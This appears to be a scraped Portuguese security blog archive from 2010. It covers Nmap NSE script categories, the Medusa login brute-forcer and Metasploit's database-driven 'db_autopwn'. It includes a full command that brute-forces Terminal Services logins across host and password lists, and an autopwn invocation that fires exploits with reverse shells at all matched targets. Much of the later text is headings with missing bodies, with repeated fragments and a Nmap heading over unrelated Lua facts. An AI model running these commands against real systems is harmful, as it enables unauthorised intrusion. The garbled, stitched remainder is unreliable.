
Descrição de cada categoria

auth

Ataque de força bruta, esses scripts tentam determinar as credenciais de autenticação no sistema alvo, os exemplos incluem snmp-brute, http-auth e ftp-anom.

default

Estes scripts são o conjunto padrão e são executados quando se usa as opções -sC ou -A ao invés de listar os scripts com –script. Muitos fatores são considerados na decisão de se um script deverá ser executado por padrão:

Velocidade
Terminar rapidamente, o que exclui força bruta, web spiders ou quaisquer outros que levem muito tempo para examinar um único serviço.
Utilidade
Exames padrões precisam produzir informações valiosas e que possam servir de base para ações.
Verbosidade
Precisa ser legível e concisa.
Confiabilidade
Se o script estiver frequentemente errado, exemplos como sniffer-detect e o sql-injection ele não pertencerá à categoria default.
Intrusividade
Quanto mais intrusivo(uso de recursos do sistema remoto, DoS, percebidos como ataque pelo administradores) for um script menos ele se encaixará na categoria default.
Privacidade
Quanto mais invasivo(whois, chaves SSH e SSL fracas…) for, menos adequado ele será para inclusão na categoria default.

discovery

Tentam descobrir mais sobre a rede, os exemplos incluem registros públicos, dispositivos habilitados ao SNMP, serviços de diretórios, html-title(obtém o título do caminho raiz de websites), o smb-enum-shares(enumera compartilhamentos Windows) e o snmp-sysdescr(extrai detalhes do sistema através do SNMP).

dos

Script dessa categoria, causam denial of service.

exploit

Esses scripts tem o objetivo de explorar ativamente algumas vulnerabilidades.

external

Envio de dados a base de dados de terceiros, um exemplo é o whois, que faz uma conexão a servidores de whois.

fuzzer

Esta categoria contém scripts que são projetados para enviar ao servidor entradas inesperadas ou randômicas. Embora esta técnica possa ser útil para encontrar erros e descobrir vulnerabilidades em software, é simultaneamente lento e devoradora de banda. Um exemplo de um script nesta categoria é dns-fuzz.

intrusive

Projetados para travar o sistema ou serviço alvo, usam recursos significativos e são facilmente percebidos como um ataque, pelos administradores. Exemplos são: https-open-proxy(tenta usar o servidor alvo como proxy de HTTP) e o snmp-brute(adivinhar string de comunidade SNMP de um dispositivo, usando valores comuns, como, public, private, cisco…).

malware

Busca por infecções de malware ou backdoor’s na plataforma alvo. Exemplo: smtp-strangeport verifica serviços SMTP rodando em números de porta incomuns e o auth-spoof, detectam servidores de simulação de identd que fornecem uma resposta falsa antes de receber uma consulta.

safe

Scripts que não foram projetados para derrubar/indisponibilizar serviços. Exemplos: ssh-hostkey e o html-title.

version

São selecionados para execução somente se a detecção de versão(-sV) for inclusa, os scripts nesta categoria são uma extensão à funcionalidade de detecção de versão.

vuln

Checam vulnerabilidade especificas conhecidas. Exemplo: realvnc-auth-bypass e o xampp-default-auth.

Argumentos de linha de comando

Estes são os cinco argumentos de linha de comando específicos de exames por script:

-sC exame usando o conjunto padrão de scritps, equivale a –script=default.

- -script <filename>|<category>|<directory>|<expression>|all[,...]

(considere pipe como um operador lógico OU)

Executa um script utilizando a lista separada por vírgulas: nomes de arquivos, categorias ou diretórios.

Exemplo de Uso

Simples exame usando o conjunto omissivo de scripts:

nmap -sC exemplo.com

Execuntando um script especifico com rastreamento habilitado:

nmap –script=./showSSHVersion.nse –script-trace exemplo.com

Executa todos os scritps no diretório meuscripts, bem como todos os scripts omissivos da categoria safe:

nmap –script=meuscripts,safe exemplo.com

Mais exemplos:

nmap -sC example.com
nmap -sn -sC example.com
nmap -Pn -sn -sC example.com
nmap –script smb-os-discovery –script-trace example.com
nmap –script snmp-sysdescr –script-args snmpcommunity=admin example.com
nmap –script mycustomscripts,safe example.com

Estou criando alguns vídeos para inserir neste post, em breve(espero ).

Nmap Development Mailing Lis –> thttp://seclists.org/nmap-dev/

Attack Vector in Favorite nmap NSE scripts –> http://www.attackvector.org/favorite-nmap-nse-scripts/

SANS – Scanning Windows Deeper With the Nmap Scanning Engine –> http://www.sans.org/reading_room/whitepapers/testing/scanning-windows-deeper-nmap-scanning-engine_33138

[Documentário]Hackers are People Too

thekernel — Sat, 13 Nov 2010 23:40:51 +0000

Hackers are People Too é provavelmente um daqueles documentários raros que projeta um verdadeiro hacker, e não pretende mostra-lo como um vilão digital que envia spams e rouba das pessoas.
Então, na verdade, o que é um hacker?
A essência do ser hacker é a exploração tentando fazer coisas de maneiras não convencionais.

O vídeo é curto, onde a discussão está centrada em torno de: Quem são os hackers, a forma como eles pensam, suas comunidades e o que eles amam fazer. Um monte de hackers conhecidos são entrevistados neste documentário, no geral é muito bom, e definitivamente vale a pena assistir.

Link: http://www.hackersarepeopletoo.com/

Medusa Parallel Network Login Auditor

thekernel — Fri, 27 Aug 2010 21:55:54 +0000

Medusa é um brute force de login de serviços de rede, disponível em Foofus.net. Ele é rápido, massivamente paralelo e modular, atualmente com módulos para os seguintes serviços: AFP, CVS, FTP, HTTP,IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL,rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet,VmAuthd, VNC. Que também inclui um módulo básico web-form e o módulo genérico wrapper para scripts externos.

Brute force no serviço SSH2:

Medusa também é uma alternativa ao TSGrinder.

Brute Force no serviço TS(Terminal Services Server) usando o módulo wrapper:

medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -H hosts.txt -U users.txt -P passwords.txt

Uma forma para esconder a saída gráfica do rdesktop:

% Xvfb :97 -ac -nolisten tcp & % export DISPLAY=:97

Até aqui, nada novo, hoje existe inumeros vídeos/docs de ferramentas brute force pela rede, mas o importante é saber que a ferramenta está em desenvolvimento e se atualizando contatantemente, e é isso que nos deixa felizes =]

Vou atualizar o post assim que possível com uma ferramenta brute force gráfica.

Night Da Hack 2010

thekernel — Wed, 25 Aug 2010 00:20:05 +0000

Feedback edition 2010

After more than six months of preparation, the Night da Hack ended Sunday, June 20. Many personalities from the world of security were present and maybe future personalities in the field. It was also the occasion for all to meet #hzv people IRL. This night was special because for the first year we had sponsors, international talks, and especially more than 600 people came to share a drink in a festive atmosphere.

You can find the slides of the conferences below, then the official videos of the event in a few days on site the night da hack. The event was complemented by workshops led by such Babozor, XavBox, NoCrash, Sloshy, and Guifort SorcierFXK. In parallel, the CTF has been merciless, the DOS has taken over in order to lose the maximum number of points to opposing teams. Woe to the first team (choucroute) won points for the first target of the CTF became known on the dashboard developed for the occasion. Tests have been validated to catch up due to DOS, the teams are organized to maximize the attacks and the winners were made known … The results of the CTF are published in detail later.

As for public Wargame, WiFi problems have complicated the operations of the challengers, but for the most diligent and brave of them, a number of tests have been validated.
Overall it is about 80% of the events of the CTF and wargame overall public who have not been validated. It must be said that the staff in charge of events has not been idle. We decided to put online the public wargame part of Night da Hack. You’ll find it at this address: http://wargame.nuitduhack.com/ Enjoy and good game…

Conclusion, this night has been rich in emotion and exhausting for the entire STAFF. We thank you for your support and also thank all staff for their unwavering implications, which helped make this night of unforgettable Hack. We took into account any feedback (good or bad …) so that the 2011 edition is to meet your expectations.

If you wish to contribute to the community and be part of the organization of Night Da Hack. Contact us at team@hackerzvoice.net

Remember of HackerZVoice meeting, every first Saturday of each month (located in Paris) and soon (maybe) a HZV ezine #04. In the meantime you can always read the HZV ezine #03

Mais =] –> http://www.nightdahack.com/

Metasploit + Data Base + Nmap = Automated Exploitation

thekernel — Thu, 19 Aug 2010 01:59:22 +0000

Metasploit com Autopwn
MSF permite armazenar os resultados de um mapeamento em um banco de dados e usar o resultado para disparar uma exploração automática.

A estrutura suporta o uso dos seguintes bancos de dados :

Postgres

MySQL

SQLite (versão 2 e 3)

Instalar MySQL:
gem install mysql

A Base de Dados
MSF cria um banco de dados para a sua utilização. Este banco contém as seguintes tabelas:

hosts

refs

services

vulns

vulns_refs

Nota: A pasta metasploit3/msf3/data contém arquivos que são usados para criar as tabelas do banco.

Carregando MySQL
Antes de começar a usar bases de dados com o MSF, o módulo de banco de dados apropriado deve ser carregado. Isso pode ser feito usando o comandos db_.
Aqui está um exemplo de uso do MySQL com MSF.

msf > db_driver
msf > db_driver mysql
msf > help

Criando a Base de Dados
O comando db_create permite que você crie um novo banco de dados. Vamos criar um banco de dados chamado Metasploit:
msf > db_create root:senha@localhost/metasploit

Para verificar possível existência de erros, acesse o MySQL via console.

$ mysql -u root -p
mysql> show databases;

Usando Base
Para futuras sessões você pode simplesmente usá-lo com o comando db_connect tanto para criar quanto para conectar.
msf > db_connect root:senha@localhost/metasploit

Help

db_add_host
Add one or more hosts to the database

db_add_note
Add a note to host

db_add_port
Add a port to host

db_autopwn
Automatically exploit everything

db_hosts
List all hosts in the database

db_import_nessus_nbe
Import a Nessus scan result file (NBE)

db_import_nmap_xml
Import a Nmap scan results file (-oX)

db_nmap
Executes nmap and records the output automatically

db_notes
List all notes in the database

db_services
List all services in the database

db_vulns
List all vulnerabilities in the database

O mais importante é o db_nmap que irá executar o nmap com comandos especificados e gravar os resultados no banco de dados criado.
msf> db_nmap -sV 192.168.1.0/24

Importar resultado XML do Nmap
Caso não tenha utilizado o nmap dentro do metasploit pode se importar os resultados do nmap salvos na saida(-oX/-oA) no formato XML.
msf > db_import_nmap_xml result_nmap.xml

Pode também se importar os dados do OpenVAS por um arquivo XML.

Ao termino da execução do nmap, para listar o host(s) encontrado no exame…
msf> db_hosts

Para listar as possíveis vulnerabilidades encontradas no exame dos hosts.
msf> db_vulns

Exploração Automáticas dos Host(s) com db_autopwn (Autopwn)
msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range

msf > db_autopwn -t -x -e -r

Desconectando da Base
Se em uma sessão, você sente que já não têm a necessidade de utilizar o banco de dados, então você pode se desconectar.
msf > db_disconnect

Destruindo Banco
Quando você quiser excluir o banco de dados com todos os dados nele, você pode fazê-lo usando o comando db_destroy.
msf > db_destroy root:mydbpass@localhost/metasploit

TheKernel

Questions and Answers About XSS

The Beginners Guide to XSS

___-:: Disclaimer ::-___

___ -:: Introduction ::- ___

___ -:: Finding the Bug – With Fuzzing ::- ___

___ -:: Finding the Bug – With Auditing ::- ___

___ -:: Additional Information ::- ___

Facebook Attach EXE Vulnerability – POC

POC

1. Resumo:

2. Descrição:

3. Impacto:

Creditos:

Discovered by Nathan Power – www.securitypentest.com

Global CyberLympics

Attack

Defense

Hackers To Hackers Conference (H2HC)

O que é o evento:

Onde:

Capture The Flag:

Tópicos incluídos, mas não limitados a:

Videocast do Coruja de TI – H2HC

Para se tornar um hacker…

Para se tornar um hacker, você deve preencher os seguintes requisitos:

O que é um pesquisador de vulnerabilidades(Vulnerability Research) ?

Que podem ser classificadas com base em:

Por que os hackers precisam ser pesquisadores de vulnerabilidades ?

Vulnerability Research Websites

Terminologia Essencial

Ameaça:

Vulnerabilidade:

Alvo:

Ataque:

Exploit:

Segurança repousa sobre a confidencialidade, autenticidade, integridade e disponibilidade.

Confidencialidade

Autenticidade

Integridade

Disponibilidade

Fases de um Pentest/Hacking Básico

Reconhecimento

Scanning

Obter Acesso

Manutenção do Acesso

Limpando Rastros •

Fase 1 – Reconhecimento(Reconnaissance)

Tipos de Reconhecimento

Fase 2 – Exploração(Scanning)

Fase 3 – Ganhar acesso(Gaining Access)

Risco: (o mais)Alto – O hacker pode ter acesso ao nível do sistema operacional, ao nível da aplicação ou de rede.

Fase 4 – Mantendo o Acesso (Maintaining Access)

Fase 5 – Apagando Rastros (Covering Tracks) @não seja uma lesma

Após isso, você pode tentar responder as seguintes perguntas:

Tipos de Ataques

1. Ataques ao Sistema Operacional

2. Ataques a Aplicações

3. Ataques ao Código

4. Ataques à Configurações Incorretas

Como Conduzir um Hacking (ético)

Ethical Hacking Testing

Abordagens para o teste são mostrados abaixo:

Black box

White box

Gray box

Relatório(Report):

As questões a considerar:

Hacktivismo

Classes de Hackers

Black Hats

White Hats

Gray Hats

Introdução ao Nmap Scripting Engine [NSE]

Criado no Brasil em 1993, ainda em desenvolvimento.

Manual disponível gratuitamente online.

Conhecido por seu uso na indústria dos games: World of Warcraft, Crysis, etc.

Security Tools: Nmap, Wireshark, Snort 3.0

Sem buffer overflows, format string vulns, etc.

Portável: Windows, Linux, Mac, BSD, etc.

_-:: Disclaimer ::-_

_ -:: Introduction ::- _

_ -:: Finding the Bug – With Fuzzing ::- _

_ -:: Finding the Bug – With Auditing ::- _

_ -:: Additional Information ::- _

Limpando Rastros
•